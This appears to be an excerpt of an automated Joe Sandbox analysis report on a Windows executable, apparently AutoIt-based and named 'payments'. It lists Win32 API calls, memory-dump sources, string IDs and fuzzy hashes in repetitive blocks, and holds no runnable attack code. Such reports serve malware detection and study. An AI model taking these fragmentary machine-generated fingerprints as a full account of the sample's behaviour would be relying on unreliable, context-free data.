                                                                                                                          • SendMessageW.USER32(?,0000133E,00000000,?), ref: 00CFA5D3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3850602802-2594219639
                                                                                                                          • Opcode ID: a0166d0fc586c06bb5ea9a33a793d93e5ec5c4c5c5934aad7c21ba7d87c7075d
                                                                                                                          • Instruction ID: 08824e61b822b3abee588d3af57688ed2cf4b55366cb1b19497c6d625d533982
                                                                                                                          • Opcode Fuzzy Hash: a0166d0fc586c06bb5ea9a33a793d93e5ec5c4c5c5934aad7c21ba7d87c7075d
                                                                                                                          • Instruction Fuzzy Hash: C011EE70500748AFDB20CF34C891AE7BBE9BF05300F10850DEAAA87391DB316906DB62
                                                                                                                          APIs
                                                                                                                          • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00CEA84E
                                                                                                                          • htons.WSOCK32(00000000,?,00000000), ref: 00CEA88B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: htonsinet_addr
                                                                                                                          • String ID: 255.255.255.255
                                                                                                                          • API String ID: 3832099526-2422070025
                                                                                                                          • Opcode ID: e2d82b6d0631ab2addf63d2e6a403641a8c2191f3e70756bbe604b1ce2977a87
                                                                                                                          • Instruction ID: 27bd481465d404871a4711566f70ad5f6b10de92416cc5896b95c02261a0db4e
                                                                                                                          • Opcode Fuzzy Hash: e2d82b6d0631ab2addf63d2e6a403641a8c2191f3e70756bbe604b1ce2977a87
                                                                                                                          • Instruction Fuzzy Hash: 5C01D275200345AFCB219F69C896FA9B365EF44310F10842AF5269B3D1DB71E806D766
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
                                                                                                                          • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,00D0E44F,?,?,?), ref: 00CFF344
                                                                                                                            • Part of subcall function 00CAB526: GetWindowLongW.USER32(?,000000EB), ref: 00CAB537
                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00CFF32A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LongWindow$MessageProcSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 982171247-2594219639
                                                                                                                          • Opcode ID: abc18f749a557bc3c42802b47d7e6f0e26e263f46b23c6f3dbf8680cad71b921
                                                                                                                          • Instruction ID: ef61df8e727785b798c95ecefe8a24d7c183b2da5d9e40275ca4eb9d866f43dc
                                                                                                                          • Opcode Fuzzy Hash: abc18f749a557bc3c42802b47d7e6f0e26e263f46b23c6f3dbf8680cad71b921
                                                                                                                          • Instruction Fuzzy Hash: 6F019E35201218ABCB219F14DC44FBA7B67FF86325F284568FA554B2B1C771AC07DB62
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CCC66D
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00CCC69D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3850602802-2594219639
                                                                                                                          • Opcode ID: fa3e99bac9449487dfdca4c8c5697e88149ce0188a157139ace009978d425ee4
                                                                                                                          • Instruction ID: e8124443378b9e56ee4e5554b5e8d1bce6386e906c0c6f783a18e77ac334d030
                                                                                                                          • Opcode Fuzzy Hash: fa3e99bac9449487dfdca4c8c5697e88149ce0188a157139ace009978d425ee4
                                                                                                                          • Instruction Fuzzy Hash: 92F0A075240318BFEB156E90ECC6FE67B69EB187A6F108018F7095A1D0CAE25D11A770
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CCC2DE: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00CCC2F7
                                                                                                                            • Part of subcall function 00CCC2DE: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00CCC331
                                                                                                                          • SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 00CCC7FC
                                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CCC80C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3850602802-2594219639
                                                                                                                          • Opcode ID: dc8cdfbcbdd1d0d4eec3ac7b18ba17b6279d84f6d4cfee8e21439daea2fa3b2d
                                                                                                                          • Instruction ID: b8478edd0396792ef88af3f658916d466fba3ee59f1812652b157bed6747935e
                                                                                                                          • Opcode Fuzzy Hash: dc8cdfbcbdd1d0d4eec3ac7b18ba17b6279d84f6d4cfee8e21439daea2fa3b2d
                                                                                                                          • Instruction Fuzzy Hash: 6FE092792443097BF7111A61DC8AEA73B6DEB48751F104029F60495191EEA28C12A530
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassName_wcscmp
                                                                                                                          • String ID: #32770
                                                                                                                          • API String ID: 2292705959-463685578
                                                                                                                          • Opcode ID: ad4a7b387cfad52c3c98be8dc95e977e5dcf4ad267e03ad822f26d2788730edf
                                                                                                                          • Instruction ID: 233ad8673d39bc18195ea083b9b3682927c1de7f4814da51c7c139efeefe87a5
                                                                                                                          • Opcode Fuzzy Hash: ad4a7b387cfad52c3c98be8dc95e977e5dcf4ad267e03ad822f26d2788730edf
                                                                                                                          • Instruction Fuzzy Hash: 84E0D8776043292BD720EBA9DC09EC7FBACEB51760F010156F915D3141E670E70587E0
                                                                                                                          APIs
                                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00CCA63F
                                                                                                                            • Part of subcall function 00CB13F1: _doexit.LIBCMT ref: 00CB13FB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Message_doexit
                                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                                          • API String ID: 1993061046-4017498283
                                                                                                                          • Opcode ID: 91b000bdfa7c94f4f9bcb101852f73a7691e866fa80f91a0586773d87bb4072e
                                                                                                                          • Instruction ID: fedd59f6b53a71eb59fedcc6cd0bcbbd02dfc55b9cf175d12e8631b57d7a40bf
                                                                                                                          • Opcode Fuzzy Hash: 91b000bdfa7c94f4f9bcb101852f73a7691e866fa80f91a0586773d87bb4072e
                                                                                                                          • Instruction Fuzzy Hash: 44D02B313C032C3BD21136D97C1BFC476488B15B55F040015FF08951D24DF2C64012F9
                                                                                                                          APIs
                                                                                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 00D0ACC0
                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00D0AEBD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DirectoryFreeLibrarySystem
                                                                                                                          • String ID: WIN_XPe
                                                                                                                          • API String ID: 510247158-3257408948
                                                                                                                          • Opcode ID: 1b09b84842e58365622ed6d3d712e2c111263ab6757db538ee724fb9b8c99452
                                                                                                                          • Instruction ID: 112b172b141a343a6ec40d2b87bf65b7184edcea24e74eab4c0858e2c259822a
                                                                                                                          • Opcode Fuzzy Hash: 1b09b84842e58365622ed6d3d712e2c111263ab6757db538ee724fb9b8c99452
                                                                                                                          • Instruction Fuzzy Hash: A6E06574C00749EFDB11DBA9D944AECB7B8AB88301F158081E056B22A0CB704A85DF3A
                                                                                                                          APIs
                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CF86E2
                                                                                                                          • PostMessageW.USER32(00000000), ref: 00CF86E9
                                                                                                                            • Part of subcall function 00CD7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD7AD0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                          • Opcode ID: 6fbc66aa8c5673d1b72e5792e653d98eb2c32c1b1c02f080b46785a48bff0139
                                                                                                                          • Instruction ID: 8d45feb2324c348ff361ade379e113276329b052ecfad802ad0614760d735e11
                                                                                                                          • Opcode Fuzzy Hash: 6fbc66aa8c5673d1b72e5792e653d98eb2c32c1b1c02f080b46785a48bff0139
                                                                                                                          • Instruction Fuzzy Hash: 88D012313853287BF264A770AC0BFC67A199B05B21F504915F749EA2D0CEF4E941C774
                                                                                                                          APIs
                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CF86A2
                                                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CF86B5
                                                                                                                            • Part of subcall function 00CD7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD7AD0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                          • Opcode ID: 200ff3bb8dde8b9c7c96b7db2f600e374120fe07a6131db2f098b4af61f1e874
                                                                                                                          • Instruction ID: a6bd74176aad04081177c3449341edbd850cb34297165eece895c0e7dd524d9f
                                                                                                                          • Opcode Fuzzy Hash: 200ff3bb8dde8b9c7c96b7db2f600e374120fe07a6131db2f098b4af61f1e874
                                                                                                                          • Instruction Fuzzy Hash: F7D01231384328BBF264A770AC0BFC67A199B04B21F104915F749EA2D0CEF4E941C774